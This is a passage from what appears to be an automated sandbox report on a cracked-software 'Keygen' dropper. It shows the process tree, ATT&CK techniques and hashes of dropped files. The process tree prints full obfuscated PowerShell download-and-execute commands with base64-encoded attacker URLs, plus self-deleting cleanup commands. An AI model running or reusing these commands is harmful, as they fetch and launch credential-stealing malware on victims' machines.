                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Blocklisted process makes network request
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:548
                        • C:\Users\Public\krm.exe
                          "C:\Users\Public\krm.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2516
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                            6⤵
                            • Loads dropped DLL
                            PID:2640
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:960
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                                8⤵
                                • Loads dropped DLL
                                PID:2628
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  9⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1604
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2640
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:1468
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2968
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:3052
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2340
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2276
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2268
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2356
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:300
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2376
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2924
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2936
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2296
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:1720
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2432
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:560
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:1860
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2632
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:272
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:836
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:1556
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:1464
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:1692
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:684
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2588
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:620
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2008
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:1236
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:828
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:856
                              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                8⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                PID:524
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 524 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\696083074597343\\* & exit
                                  9⤵
                                    PID:1764
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /pid 524
                                      10⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2868
                            • C:\Users\Public\krm.exe
                              "C:\Users\Public\krm.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:2880
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\56C7.tmp\b1.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:568
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1164
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout 2
                        3⤵
                        • Delays execution with timeout.exe
                        PID:620
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\56C7.tmp\ba.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:1448
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1912
                          • C:\Users\Public\okn.exe
                            "C:\Users\Public\okn.exe"
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:2660
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:2804
                              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                PID:1860
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 1860 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\244991185290212\\* & exit
                                  8⤵
                                    PID:1544
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /pid 1860
                                      9⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:668
                              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: MapViewOfSection
                                • Suspicious use of SetWindowsHookEx
                                PID:2888
                                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2348
                              • C:\Users\Public\okn.exe
                                "C:\Users\Public\okn.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:2940
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\56C7.tmp\ba1.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:1092
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Loads dropped DLL
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1656
                            • C:\Users\Public\okn.exe
                              "C:\Users\Public\okn.exe"
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:2192
                              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: MapViewOfSection
                                • Suspicious use of SetWindowsHookEx
                                PID:1620
                                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  PID:2600
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /pid 2600 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\419860091933912\\* & exit
                                    8⤵
                                      PID:2352
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /pid 2600
                                        9⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1812
                                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: MapViewOfSection
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2596
                                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:620
                                • C:\Users\Public\okn.exe
                                  "C:\Users\Public\okn.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:1816

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Persistence

                      Modify Existing Service

                      1
                      T1031

                      Registry Run Keys / Startup Folder

                      1
                      T1060

                      Defense Evasion

                      Modify Registry

                      6
                      T1112

                      Disabling Security Tools

                      2
                      T1089

                      Install Root Certificate

                      1
                      T1130

                      Credential Access

                      Credentials in Files

                      3
                      T1081

                      Discovery

                      Query Registry

                      2
                      T1012

                      System Information Discovery

                      2
                      T1082

                      Collection

                      Data from Local System

                      3
                      T1005

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\MSVCP140.dll
                      • C:\ProgramData\VCRUNTIME140.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\vcruntime140.dll
                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_82f2dee2-c055-446a-beb3-e0d598c13661
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b91a0892-d508-4b15-92c9-fc45d70deed3
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e7c132b1-25fe-411c-ab49-694987fbe22f
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa37437b-8b8b-4d9f-a7bb-848d6f68d300
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Temp\1JypHZLFco.exe
                      • C:\Users\Admin\AppData\Local\Temp\1JypHZLFco.exe
                      • C:\Users\Admin\AppData\Local\Temp\56C7.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\56C7.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\56C7.tmp\b.hta
                      • C:\Users\Admin\AppData\Local\Temp\56C7.tmp\b1.hta
                      • C:\Users\Admin\AppData\Local\Temp\56C7.tmp\ba.hta
                      • C:\Users\Admin\AppData\Local\Temp\56C7.tmp\ba1.hta
                      • C:\Users\Admin\AppData\Local\Temp\56C7.tmp\m.hta
                      • C:\Users\Admin\AppData\Local\Temp\56C7.tmp\m1.hta
                      • C:\Users\Admin\AppData\Local\Temp\56C7.tmp\start.bat
                      • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\K5EVU8aSGB.exe
                      • C:\Users\Admin\AppData\Local\Temp\K5EVU8aSGB.exe
                      • C:\Users\Admin\AppData\Local\Temp\LszKH5wf1v.exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • C:\Users\Admin\AppData\Local\Temp\LszKH5wf1v.exe
